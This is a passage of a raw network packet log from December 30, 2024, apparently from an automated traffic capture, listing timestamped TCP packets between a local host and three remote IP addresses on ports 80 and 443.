                                                                                                                                                                                Dec 30, 2024 19:45:42.767611027 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.767664909 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.772473097 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.773153067 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.789786100 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.789861917 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.789894104 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.789937973 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.789946079 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.789951086 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.789983034 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.790396929 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.790460110 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.790707111 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.790764093 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.856333971 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.856442928 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.856580973 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.856647968 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.856723070 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.856780052 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.856852055 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.856910944 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857130051 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857186079 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857330084 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857384920 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857486963 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857543945 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857754946 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857801914 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857811928 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857820034 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857845068 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857858896 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857882977 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857887983 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.857898951 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.857928991 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.858067036 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.858117104 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.858123064 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.858156919 CET44350067192.185.175.158192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:42.858165026 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.858202934 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.875585079 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.875653028 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:42.881649017 CET50067443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:43.757122040 CET805006858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:43.757222891 CET805006858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:43.757379055 CET5006880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:43.757431030 CET5006880192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:43.762202024 CET805006858.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:43.829611063 CET5006980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:43.834420919 CET805006958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:43.834611893 CET5006980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:43.834738970 CET5006980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:43.834769964 CET5006980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:43.839453936 CET805006958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:43.839627028 CET805006958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:45.285413980 CET805006958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:45.285710096 CET805006958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:45.285810947 CET5006980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:45.328774929 CET5006980192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:45.333549976 CET805006958.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:45.687335014 CET5007080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:45.692236900 CET805007058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:45.692313910 CET5007080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:45.692699909 CET5007080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:45.692713976 CET5007080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:45.697448015 CET805007058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:45.697679996 CET805007058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:47.149158001 CET805007058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:47.149411917 CET805007058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:47.149473906 CET5007080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:47.149513960 CET5007080192.168.2.458.151.148.90
                                                                                                                                                                                Dec 30, 2024 19:45:47.154304028 CET805007058.151.148.90192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:47.157368898 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:47.162261963 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:47.162344933 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:47.162472010 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:47.167177916 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013889074 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013916016 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013926983 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013940096 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013950109 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013962030 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.013967991 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.014014006 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.014065027 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.014086962 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.014096975 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.014107943 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.014131069 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.014153957 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.018821955 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.018832922 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.018843889 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.018856049 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.018876076 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.018898964 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.123940945 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.123955965 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.123966932 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.123979092 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124026060 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.124064922 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.124141932 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124221087 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124237061 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124248981 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124259949 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124279022 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.124304056 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.124959946 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124970913 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124983072 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.124993086 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125003099 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.125004053 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125032902 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.125057936 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.125742912 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125754118 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125766039 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125776052 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125787020 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.125788927 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.125813961 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.126549006 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.126560926 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.126580000 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.126590967 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.126600981 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.126606941 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.126631021 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.126641989 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.128784895 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233655930 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233668089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233679056 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233690023 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233701944 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.233727932 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.233829021 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233856916 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.233876944 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.234033108 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234045982 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234055996 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234086037 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.234108925 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.234298944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234311104 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234321117 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234348059 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.234663963 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234674931 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234684944 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234694958 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.234716892 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.234741926 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.235028982 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235039949 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235049009 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235071898 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.235095024 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.235359907 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235369921 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235394001 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235404968 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235407114 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.235416889 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235426903 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235440969 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.235455036 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.235477924 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.236223936 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236236095 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236248016 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236278057 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.236295938 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.236370087 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236381054 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236391068 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236402988 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.236412048 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.237155914 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237166882 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237170935 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.237179041 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237190008 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237200975 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237212896 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.237212896 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237221956 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.237226963 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.237257957 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.237962961 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238070011 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238080978 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238084078 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.238104105 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238116026 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238126040 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.238126993 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238140106 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238157988 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.238181114 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.238908052 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238919973 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238930941 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238943100 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.238960981 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.238992929 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343521118 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343533993 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343544006 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343559027 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343569040 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343586922 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343597889 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343597889 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343609095 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343636036 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343641996 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343646049 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343661070 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343688965 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343722105 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343733072 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343750954 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343760014 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.343785048 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343797922 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.343993902 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344002962 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344053984 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344114065 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344125032 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344135046 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344166994 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344170094 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344183922 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344194889 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344217062 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344233036 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344418049 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344429016 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344439030 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344449997 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344481945 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344497919 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344506025 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344507933 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344520092 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344530106 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344556093 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344573021 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344583988 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344594002 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344611883 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344623089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344631910 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344649076 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344662905 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344707966 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344717026 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344763041 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.344943047 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344963074 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344974995 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344985008 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.344986916 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.345000029 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345009089 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345011950 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.345041037 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.345094919 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345113993 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345125914 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345154047 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.345177889 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.345221043 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345232010 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345242977 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345252991 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345263958 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.345271111 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.345293999 CET5007180192.168.2.4101.99.94.162
                                                                                                                                                                                Dec 30, 2024 19:45:48.348385096 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.348426104 CET8050071101.99.94.162192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:48.348437071 CET8050071101.99.94.162192.168.2.4
